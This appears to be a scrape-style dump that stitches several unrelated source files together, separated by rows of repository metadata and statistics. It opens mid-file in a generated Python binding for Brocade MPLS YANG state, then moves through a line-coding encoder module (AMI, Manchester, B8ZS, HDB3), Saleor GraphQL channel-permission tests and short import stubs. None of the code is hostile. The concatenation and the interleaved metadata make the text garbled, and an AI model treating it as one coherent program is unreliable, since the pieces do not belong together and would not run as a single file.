            'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="frr-active", rest_name="frr-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
        })
    self.__frr_active = t
    # Propagate the change to the containing tree when a hook exists.
    if hasattr(self, '_set'):
        self._set()
def _unset_frr_active(self):
    # Reset frr_active to a fresh, default-constructed boolean leaf.
    self.__frr_active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="frr-active", rest_name="frr-active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_frr_up(self):
    """
    Getter method for frr_up, mapped from YANG variable /mpls_state/lsp/forwarding/frr_up (boolean)

    YANG Description: lsp_forwarding_frr_up

    Returns the YANGDynClass-wrapped boolean leaf value.
    """
    return self.__frr_up
def _set_frr_up(self, v, load=False):
    """
    Setter method for frr_up, mapped from YANG variable /mpls_state/lsp/forwarding/frr_up (boolean)

    If this variable is read-only (config: false) in the
    source YANG file, then _set_frr_up is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_frr_up() directly.

    YANG Description: lsp_forwarding_frr_up

    Raises ValueError when v is not compatible with boolean.
    """
    # Union-typed values carry a _utype coercion hook; unwrap first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Validate/wrap the value as a YANG boolean leaf.
        t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="frr-up", rest_name="frr-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """frr_up must be of a type compatible with boolean""",
            'defined-type': "boolean",
            'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="frr-up", rest_name="frr-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
        })
    self.__frr_up = t
    # Propagate the change to the containing tree when a hook exists.
    if hasattr(self, '_set'):
        self._set()
def _unset_frr_up(self):
    # Reset frr_up to a fresh, default-constructed boolean leaf.
    self.__frr_up = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="frr-up", rest_name="frr-up", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_instance_id(self):
    """
    Getter method for instance_id, mapped from YANG variable /mpls_state/lsp/forwarding/instance_id (uint32)

    YANG Description: lsp_forwarding_instance_id

    Returns the YANGDynClass-wrapped uint32 leaf value.
    """
    return self.__instance_id
def _set_instance_id(self, v, load=False):
    """
    Setter method for instance_id, mapped from YANG variable /mpls_state/lsp/forwarding/instance_id (uint32)

    If this variable is read-only (config: false) in the
    source YANG file, then _set_instance_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_instance_id() directly.

    YANG Description: lsp_forwarding_instance_id

    Raises ValueError when v is not compatible with uint32.
    """
    # Union-typed values carry a _utype coercion hook; unwrap first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Validate/wrap against the uint32 restriction (0..4294967295).
        t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="instance-id", rest_name="instance-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """instance_id must be of a type compatible with uint32""",
            'defined-type': "uint32",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="instance-id", rest_name="instance-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
        })
    self.__instance_id = t
    # Propagate the change to the containing tree when a hook exists.
    if hasattr(self, '_set'):
        self._set()
def _unset_instance_id(self):
    # Reset instance_id to a fresh, default-constructed uint32 leaf.
    self.__instance_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="instance-id", rest_name="instance-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_out_port_id(self):
    """
    Getter method for out_port_id, mapped from YANG variable /mpls_state/lsp/forwarding/out_port_id (uint32)

    YANG Description: lsp_forwarding_out_port_id

    Returns the YANGDynClass-wrapped uint32 leaf value.
    """
    return self.__out_port_id
def _set_out_port_id(self, v, load=False):
    """
    Setter method for out_port_id, mapped from YANG variable /mpls_state/lsp/forwarding/out_port_id (uint32)

    If this variable is read-only (config: false) in the
    source YANG file, then _set_out_port_id is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_out_port_id() directly.

    YANG Description: lsp_forwarding_out_port_id

    Raises ValueError when v is not compatible with uint32.
    """
    # Union-typed values carry a _utype coercion hook; unwrap first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Validate/wrap against the uint32 restriction (0..4294967295).
        t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="out-port-id", rest_name="out-port-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """out_port_id must be of a type compatible with uint32""",
            'defined-type': "uint32",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="out-port-id", rest_name="out-port-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
        })
    self.__out_port_id = t
    # Propagate the change to the containing tree when a hook exists.
    if hasattr(self, '_set'):
        self._set()
def _unset_out_port_id(self):
    # Reset out_port_id to a fresh, default-constructed uint32 leaf.
    self.__out_port_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="out-port-id", rest_name="out-port-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_out_port_name(self):
    """
    Getter method for out_port_name, mapped from YANG variable /mpls_state/lsp/forwarding/out_port_name (string)

    YANG Description: lsp_forwarding_out_port_name

    Returns the YANGDynClass-wrapped string leaf value.
    """
    return self.__out_port_name
def _set_out_port_name(self, v, load=False):
    """
    Setter method for out_port_name, mapped from YANG variable /mpls_state/lsp/forwarding/out_port_name (string)

    If this variable is read-only (config: false) in the
    source YANG file, then _set_out_port_name is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_out_port_name() directly.

    YANG Description: lsp_forwarding_out_port_name

    Raises ValueError when v is not compatible with string.
    """
    # Union-typed values carry a _utype coercion hook; unwrap first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Validate/wrap the value as a YANG string leaf.
        t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="out-port-name", rest_name="out-port-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """out_port_name must be of a type compatible with string""",
            'defined-type': "string",
            'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="out-port-name", rest_name="out-port-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
        })
    self.__out_port_name = t
    # Propagate the change to the containing tree when a hook exists.
    if hasattr(self, '_set'):
        self._set()
def _unset_out_port_name(self):
    # Reset out_port_name to a fresh, default-constructed string leaf.
    self.__out_port_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="out-port-name", rest_name="out-port-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_out_label(self):
    """
    Getter method for out_label, mapped from YANG variable /mpls_state/lsp/forwarding/out_label (uint32)

    YANG Description: lsp_forwarding_out_label

    Returns the YANGDynClass-wrapped uint32 leaf value.
    """
    return self.__out_label
def _set_out_label(self, v, load=False):
    """
    Setter method for out_label, mapped from YANG variable /mpls_state/lsp/forwarding/out_label (uint32)

    If this variable is read-only (config: false) in the
    source YANG file, then _set_out_label is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_out_label() directly.

    YANG Description: lsp_forwarding_out_label

    Raises ValueError when v is not compatible with uint32.
    """
    # Union-typed values carry a _utype coercion hook; unwrap first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Validate/wrap against the uint32 restriction (0..4294967295).
        t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="out-label", rest_name="out-label", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """out_label must be of a type compatible with uint32""",
            'defined-type': "uint32",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="out-label", rest_name="out-label", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
        })
    self.__out_label = t
    # Propagate the change to the containing tree when a hook exists.
    if hasattr(self, '_set'):
        self._set()
def _unset_out_label(self):
    # Reset out_label to a fresh, unconfigured YANGDynClass instance
    # (identical construction to the one used in _set_out_label).
    self.__out_label = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="out-label", rest_name="out-label", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
# Read-only property bindings (config: false leaves expose only getters),
# plus the registry pyangbind uses to enumerate this container's children.
tunnel_vif_index = __builtin__.property(_get_tunnel_vif_index)
lsp_id = __builtin__.property(_get_lsp_id)
forwarding_up = __builtin__.property(_get_forwarding_up)
primary_active = __builtin__.property(_get_primary_active)
primary_up = __builtin__.property(_get_primary_up)
secondary_active = __builtin__.property(_get_secondary_active)
secondary_up = __builtin__.property(_get_secondary_up)
selected_secondary_active = __builtin__.property(_get_selected_secondary_active)
selected_secondary_up = __builtin__.property(_get_selected_secondary_up)
frr_active = __builtin__.property(_get_frr_active)
frr_up = __builtin__.property(_get_frr_up)
instance_id = __builtin__.property(_get_instance_id)
out_port_id = __builtin__.property(_get_out_port_id)
out_port_name = __builtin__.property(_get_out_port_name)
out_label = __builtin__.property(_get_out_label)

_pyangbind_elements = {'tunnel_vif_index': tunnel_vif_index, 'lsp_id': lsp_id, 'forwarding_up': forwarding_up, 'primary_active': primary_active, 'primary_up': primary_up, 'secondary_active': secondary_active, 'secondary_up': secondary_up, 'selected_secondary_active': selected_secondary_active, 'selected_secondary_up': selected_secondary_up, 'frr_active': frr_active, 'frr_up': frr_up, 'instance_id': instance_id, 'out_port_id': out_port_id, 'out_port_name': out_port_name, 'out_label': out_label, }
| 65.445926
| 502
| 0.750272
| 5,996
| 44,176
| 5.233489
| 0.030354
| 0.042702
| 0.055322
| 0.05443
| 0.910771
| 0.885819
| 0.851562
| 0.829286
| 0.821829
| 0.815328
| 0
| 0.008976
| 0.127422
| 44,176
| 674
| 503
| 65.543027
| 0.805095
| 0.193091
| 0
| 0.505435
| 0
| 0.040761
| 0.361216
| 0.208887
| 0
| 0
| 0
| 0
| 0
| 1
| 0.130435
| false
| 0
| 0.021739
| 0
| 0.263587
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
077c93a353aa9d6dfaeb233e41f4886060e32525
| 39
|
py
|
Python
|
plain_logger/__init__.py
|
prapanw/plain_logger
|
075563b9c90d1918e1158bfc0a542e0cac6570e4
|
[
"MIT"
] | null | null | null |
plain_logger/__init__.py
|
prapanw/plain_logger
|
075563b9c90d1918e1158bfc0a542e0cac6570e4
|
[
"MIT"
] | null | null | null |
plain_logger/__init__.py
|
prapanw/plain_logger
|
075563b9c90d1918e1158bfc0a542e0cac6570e4
|
[
"MIT"
] | null | null | null |
from plain_logger.Logger import Logger
| 19.5
| 38
| 0.871795
| 6
| 39
| 5.5
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 39
| 1
| 39
| 39
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6afc6de32f391e061be91dfe95af321598aecc9f
| 7,714
|
py
|
Python
|
line_coding_schemes.py
|
Shrey-Viradiya/LineCoding
|
2bd6d6019ee2af12fa8ffb777fdfec0c286ee327
|
[
"BSD-3-Clause"
] | 4
|
2019-10-24T15:55:28.000Z
|
2020-10-16T09:23:50.000Z
|
line_coding_schemes.py
|
Shrey-Viradiya/LineCoding
|
2bd6d6019ee2af12fa8ffb777fdfec0c286ee327
|
[
"BSD-3-Clause"
] | null | null | null |
line_coding_schemes.py
|
Shrey-Viradiya/LineCoding
|
2bd6d6019ee2af12fa8ffb777fdfec0c286ee327
|
[
"BSD-3-Clause"
] | null | null | null |
from utilities import text2binary
def polarRZ(message):
    """Polar return-to-zero encoding.

    Each bit yields two samples: the signal level for the first half of
    the bit interval (-1 for '0', +1 for '1') followed by a return to 0.
    """
    encoded = []
    for bit in text2binary(message):
        encoded.append(-1 if bit == '0' else 1)
        encoded.append(0)  # return to zero in the second half interval
    return encoded
def AMI(message):
    """Alternate Mark Inversion encoding.

    Zeros map to level 0; successive ones alternate between +1 and -1.
    """
    encoded = []
    polarity = 1  # polarity of the next mark ('1' bit)
    for bit in text2binary(message):
        if bit == '0':
            encoded.append(0)
        else:
            encoded.append(polarity)
            polarity = -polarity
    return encoded
def pseudoternary(message):
    """Pseudoternary encoding — the dual of AMI.

    Ones map to level 0; successive zeros alternate between +1 and -1.
    """
    encoded = []
    polarity = 1  # polarity of the next '0' pulse
    for bit in text2binary(message):
        if bit == '1':
            encoded.append(0)
        else:
            encoded.append(polarity)
            polarity = -polarity
    return encoded
def NRZ_L(message):
    """Non-return-to-zero level: '0' -> +1, '1' -> -1, one sample per bit."""
    return [1 if bit == '0' else -1 for bit in text2binary(message)]
def NRZ_I(message):
    """Non-return-to-zero inverted.

    A '1' toggles the current level before it is emitted; a '0' repeats
    the current level.  The line starts at +1 (so the first '1' emits -1).
    """
    encoded = []
    level = 1
    for bit in text2binary(message):
        if bit == '1':
            level = -level
        encoded.append(level)
    return encoded
def twoBoneQ(message):
    """2B1Q (two binary, one quaternary) encoder.

    Each pair of bits maps to one of four levels; the level's sign is
    mirrored whenever the previously emitted sample was negative, which
    keeps the line balanced.  Two equal samples are emitted per pair,
    matching the other encoders in this module (one sample per half
    interval).  A trailing odd bit, if any, is dropped — same as the
    original implementation.

    Bug fix: the original first-pair branch for bits '1','1' appended
    (-2, 2) while every other branch appends two equal samples; it now
    appends (-2, -2), consistent with the general '1','1' case.
    """
    # Levels used when the previous sample was positive (and for the
    # very first pair, which the original encoded with these absolute
    # levels as well).
    base_levels = {
        ('0', '0'): 1,
        ('0', '1'): 2,
        ('1', '0'): -1,
        ('1', '1'): -2,
    }
    bits = text2binary(message)
    output3 = []
    for i in range(0, len(bits) - 1, 2):
        level = base_levels[(bits[i], bits[i + 1])]
        # The original tested output3[i-1]; since two samples are
        # appended per pair and i advances by 2, that is always the most
        # recently emitted sample.  Levels are never 0, so "not > 0"
        # means "negative".
        if output3 and output3[-1] <= 0:
            level = -level
        output3.append(level)
        output3.append(level)
    return output3
def Manchester(message):
    """Manchester encoding: '0' -> high-then-low, '1' -> low-then-high.

    Two samples per bit, one for each half of the bit interval.
    """
    encoded = []
    for bit in text2binary(message):
        first_half, second_half = (1, -1) if bit == '0' else (-1, 1)
        encoded.append(first_half)
        encoded.append(second_half)
    return encoded
def diff_Manchester(message):
    """Differential Manchester encoding.

    Two samples per bit.  Relative to the level at the end of the
    previous bit (`last_level`, treated as +1 before the first bit):
    a '0' starts at that level and flips mid-bit, a '1' flips at the
    bit boundary and flips back mid-bit.  This reproduces the original
    per-case table exactly, including the first-bit cases
    ('0' -> 1,-1 and '1' -> -1,1).
    """
    encoded = []
    last_level = 1  # level at the end of the previous bit interval
    for bit in text2binary(message):
        if bit == '0':
            encoded.append(last_level)
            encoded.append(-last_level)
            last_level = encoded[-1]
        elif bit == '1':
            encoded.append(-last_level)
            encoded.append(last_level)
            last_level = encoded[-1]
    return encoded
def MLT_3(message):
    """MLT-3 encoding: '0' holds the current level, '1' moves to the
    next level in the cycle, passing through 0 between the extremes.

    NOTE(review): the first '1' emits +1 without updating `flag`, so on
    the next departure from 0 the level is +1 again (sequence
    +1,0,+1,0,-1,...).  Textbook MLT-3 cycles 0,+1,0,-1 — confirm
    whether this start-up behavior is intended.
    """
    output = []
    b = text2binary(message)
    flag =-1
    for i in range(len(b)):
        if i==0:
            # First bit: '0' starts at 0, '1' starts at +1 (flag untouched).
            if b[0]=='0':
                output.append(0)
            else:
                output.append(1)
        elif b[i]=='0':
            # '0' repeats the previous level.
            output.append(output[i-1])
        else:
            # '1': if we are at an extreme (+1/-1), step back to 0;
            # otherwise leave 0 toward the extreme recorded in `flag`.
            if output[i-1]==1 or output[i-1]==-1:
                output.append(0)
            else:
                if flag==1:
                    output.append(-1)
                    flag=-1
                else:
                    output.append(1)
                    flag=1
    return output
def B8ZS(message):
    """Bipolar-with-8-zero-substitution encoding.

    Base coding is AMI ('0' -> 0, ones alternate polarity via `change`).
    A run of eight zeros (not at the very start) is replaced by the
    pattern 000VB0VB, whose polarity depends on the last real pulse:
    `change == -1` means the previous mark was +1, so the substitution
    is 000+-0-+; otherwise 000-+0+-.  The substitution contains two
    balanced B pulses, so `change` is deliberately left untouched.
    """
    output = []
    b = text2binary(message)
    change = 1
    i=0
    while(i<len(b)):
        # Eight consecutive zeros, not at position 0: emit a substitution.
        if(i<=(len(b)-8) and b[i]=='0' and b[i+1]=='0' and b[i+2]=='0' and b[i+3]=='0' and b[i+4]=='0' and b[i+5]=='0' and b[i+6]=='0' and b[i+7]=='0' and i!=0 ):
            if change==-1:
                # Previous pulse was +1 -> 000 +1 -1 0 -1 +1
                output.append(0)
                output.append(0)
                output.append(0)
                output.append(1)
                output.append(-1)
                output.append(0)
                output.append(-1)
                output.append(1)
                i+=8
            else:
                # Previous pulse was -1 -> 000 -1 +1 0 +1 -1
                output.append(0)
                output.append(0)
                output.append(0)
                output.append(-1)
                output.append(1)
                output.append(0)
                output.append(1)
                output.append(-1)
                i+=8
        elif (b[i] == '0'):
            output.append(0)
            i+=1
        else:
            # Ordinary AMI mark: emit current polarity, then alternate.
            output.append(change)
            i+=1
            if(change == 1):
                change = -1
            else:
                change = 1
    return output
def HDB_3(message):
    """High-density bipolar 3 (HDB3) encoding.

    Base coding is AMI; a run of four zeros (not at the very start) is
    replaced by 000V or B00V depending on the parity of `c`, the count
    of pulses emitted since the last substitution.  `change` tracks the
    polarity of the *next* ordinary mark, so `change == -1` means the
    previous pulse was +1.

    NOTE(review): after a substitution `c` is reset to 0 but the branch
    `change` assignments differ between the 000V and B00V cases — this
    matches standard HDB3 alternation as far as can be verified here,
    but the polarity bookkeeping is worth checking against G.703.
    """
    output = []
    b = text2binary(message)
    #b = "110000"
    change = 1
    i=0 #"110000 0000 1100001001"
    c=0 # counter of pulses since the last substitution (parity decides 000V vs B00V)
    while(i<len(b)):
        # Four consecutive zeros, not at position 0: substitute.
        if(i<=(len(b)-4) and b[i]=='0' and b[i+1]=='0' and b[i+2]=='0' and b[i+3]=='0'and i!=0):
            if(change == -1):
                # Previous pulse was +1.
                if(c%2==1):
                    # Odd pulse count: 000V with V matching the last pulse (+1).
                    output.append(0)
                    output.append(0)
                    output.append(0)
                    output.append(1)
                    change = -1
                else:
                    # Even pulse count: B00V, both pulses -1.
                    output.append(-1)
                    output.append(0)
                    output.append(0)
                    output.append(-1)
                    change = 1
            else:
                # Previous pulse was -1 (mirror image of the branch above).
                if(c%2==1):
                    output.append(0)
                    output.append(0)
                    output.append(0)
                    output.append(-1)
                    change = 1
                else:
                    output.append(1)
                    output.append(0)
                    output.append(0)
                    output.append(1)
                    change = -1
            c=0
            i+=4
        elif (b[i] == '0'):
            output.append(0)
            i+=1
        else:
            # Ordinary AMI mark: emit, alternate polarity, count the pulse.
            output.append(change)
            i+=1
            if(change == 1):
                change = -1
                c+=1
            else:
                change = 1
                c+=1
    return output
| 27.648746
| 163
| 0.369069
| 833
| 7,714
| 3.411765
| 0.068427
| 0.278677
| 0.160099
| 0.120338
| 0.786066
| 0.753343
| 0.72273
| 0.662562
| 0.649191
| 0.646728
| 0
| 0.082142
| 0.501296
| 7,714
| 278
| 164
| 27.748201
| 0.656616
| 0.009982
| 0
| 0.809339
| 0
| 0
| 0.005503
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042802
| false
| 0
| 0.003891
| 0
| 0.089494
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ed5de515e53804d4e7759a9e14e53886e8b81641
| 3,724
|
py
|
Python
|
saleor/graphql/channel/tests/test_channel_queries.py
|
enesustundag/saleor
|
95ce4b577ca06110f4702e61f554e9d165ef5fd4
|
[
"CC-BY-4.0"
] | 1
|
2020-03-14T02:07:53.000Z
|
2020-03-14T02:07:53.000Z
|
saleor/graphql/channel/tests/test_channel_queries.py
|
enesustundag/saleor
|
95ce4b577ca06110f4702e61f554e9d165ef5fd4
|
[
"CC-BY-4.0"
] | null | null | null |
saleor/graphql/channel/tests/test_channel_queries.py
|
enesustundag/saleor
|
95ce4b577ca06110f4702e61f554e9d165ef5fd4
|
[
"CC-BY-4.0"
] | 1
|
2021-06-07T10:16:35.000Z
|
2021-06-07T10:16:35.000Z
|
import graphene
from ...tests.utils import assert_no_permission, get_graphql_content
# GraphQL document used by the channel-list permission tests below;
# requests every channel's public fields.
QUERY_CHANNELS = """
query {
channels {
name
slug
currencyCode
}
}
"""
def test_query_channels_as_staff_user(staff_api_client, channel_USD, channel_PLN):
    """Staff users may list both channels with name, slug and currency."""
    # when
    response = staff_api_client.post_graphql(QUERY_CHANNELS, {})
    payload = get_graphql_content(response)

    # then
    channel_list = payload["data"]["channels"]
    assert len(channel_list) == 2
    for channel in (channel_PLN, channel_USD):
        assert {
            "slug": channel.slug,
            "name": channel.name,
            "currencyCode": channel.currency_code,
        } in channel_list
def test_query_channels_as_app(app_api_client, channel_USD, channel_PLN):
    """App clients may list both channels with name, slug and currency."""
    # when
    response = app_api_client.post_graphql(QUERY_CHANNELS, {})
    payload = get_graphql_content(response)

    # then
    channel_list = payload["data"]["channels"]
    assert len(channel_list) == 2
    for channel in (channel_PLN, channel_USD):
        assert {
            "slug": channel.slug,
            "name": channel.name,
            "currencyCode": channel.currency_code,
        } in channel_list
def test_query_channels_as_customer(user_api_client, channel_USD, channel_PLN):
    """Plain customers are denied access to the channel list."""
    response = user_api_client.post_graphql(QUERY_CHANNELS, {})
    assert_no_permission(response)
def test_query_channels_as_anonymous(api_client, channel_USD, channel_PLN):
    """Anonymous visitors are denied access to the channel list."""
    response = api_client.post_graphql(QUERY_CHANNELS, {})
    assert_no_permission(response)
# GraphQL document used by the single-channel permission tests below;
# fetches one channel by global ID.
QUERY_CHANNEL = """
query getChannel($id: ID!){
channel(id: $id){
id
name
slug
currencyCode
}
}
"""
def test_query_channel_as_staff_user(staff_api_client, channel_USD):
    """Staff users can fetch a single channel by its global ID."""
    # given
    global_id = graphene.Node.to_global_id("Channel", channel_USD.id)

    # when
    response = staff_api_client.post_graphql(QUERY_CHANNEL, {"id": global_id})
    payload = get_graphql_content(response)

    # then
    channel_data = payload["data"]["channel"]
    expected = {
        "id": global_id,
        "name": channel_USD.name,
        "slug": channel_USD.slug,
        "currencyCode": channel_USD.currency_code,
    }
    for field, value in expected.items():
        assert channel_data[field] == value
def test_query_channel_as_app(app_api_client, channel_USD):
    """App clients can fetch a single channel by its global ID."""
    # given
    global_id = graphene.Node.to_global_id("Channel", channel_USD.id)

    # when
    response = app_api_client.post_graphql(QUERY_CHANNEL, {"id": global_id})
    payload = get_graphql_content(response)

    # then
    channel_data = payload["data"]["channel"]
    expected = {
        "id": global_id,
        "name": channel_USD.name,
        "slug": channel_USD.slug,
        "currencyCode": channel_USD.currency_code,
    }
    for field, value in expected.items():
        assert channel_data[field] == value
def test_query_channel_as_customer(user_api_client, channel_USD):
    """Plain customers are denied access to the single-channel query."""
    variables = {"id": graphene.Node.to_global_id("Channel", channel_USD.id)}
    response = user_api_client.post_graphql(QUERY_CHANNEL, variables)
    assert_no_permission(response)
def test_query_channel_as_anonymous(api_client, channel_USD):
    """Anonymous visitors are denied access to the single-channel query."""
    variables = {"id": graphene.Node.to_global_id("Channel", channel_USD.id)}
    response = api_client.post_graphql(QUERY_CHANNEL, variables)
    assert_no_permission(response)
| 25.162162
| 82
| 0.693609
| 460
| 3,724
| 5.25
| 0.1
| 0.099379
| 0.039752
| 0.06294
| 0.942443
| 0.930021
| 0.89441
| 0.879503
| 0.846377
| 0.770186
| 0
| 0.000673
| 0.201665
| 3,724
| 147
| 83
| 25.333333
| 0.811638
| 0.034103
| 0
| 0.666667
| 0
| 0
| 0.106943
| 0
| 0
| 0
| 0
| 0
| 0.218391
| 1
| 0.091954
| false
| 0
| 0.022989
| 0
| 0.114943
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ed74c60875f97bd8aff15905a7dc3474ce37a54c
| 24
|
py
|
Python
|
models/__init__.py
|
jakobottar/gimondi
|
b6e53036bc09b614ba4c7864f588cd1e1f6c76e0
|
[
"MIT"
] | 3
|
2022-01-18T19:25:46.000Z
|
2022-02-05T18:53:24.000Z
|
utils/models/other/voxnet2d/__init__.py
|
bhklab/ptl-oar-segmentation
|
354c3ee7f042a025f74e210a7b8462beac9b727d
|
[
"Apache-2.0"
] | null | null | null |
utils/models/other/voxnet2d/__init__.py
|
bhklab/ptl-oar-segmentation
|
354c3ee7f042a025f74e210a7b8462beac9b727d
|
[
"Apache-2.0"
] | null | null | null |
from .model import UNet
| 12
| 23
| 0.791667
| 4
| 24
| 4.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 24
| 1
| 24
| 24
| 0.95
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
71f4251ff357947ffb9ca198dbcab44d187f7203
| 182
|
py
|
